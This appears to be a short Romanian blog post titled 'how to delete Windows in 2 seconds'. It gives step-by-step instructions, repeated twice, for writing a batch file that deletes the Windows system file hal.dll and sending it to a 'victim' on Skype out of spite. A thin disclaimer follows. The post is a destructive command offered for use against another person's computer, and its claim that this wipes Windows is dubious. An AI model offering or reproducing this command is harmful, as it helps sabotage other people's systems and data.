Cum sa stergi windows in 2 sec !
Tea Suparat cineva?Fa un program de sters windowsul dupa urmatorul tutorial:
1.Deschizi Notepad
2.Adaugi in notepad urmatoarea linie: del %SystemRoot%\system32\hal.dll
3.Salvezi cu nume.bat
4.Il trimiti victimei pe Skype!!
Nu va recomand sa dati clic pe el!!o faceti pe propria raspundere!!
1.Deschizi Notepad
2.Adaugi in notepad urmatoarea linie: del %SystemRoot%\system32\hal.dll
3.Salvezi cu nume.bat
4.Il trimiti victimei pe Skype!!
Nu va recomand sa dati clic pe el!!o faceti pe propria raspundere!!
Niciun comentariu:
Trimiteți un comentariu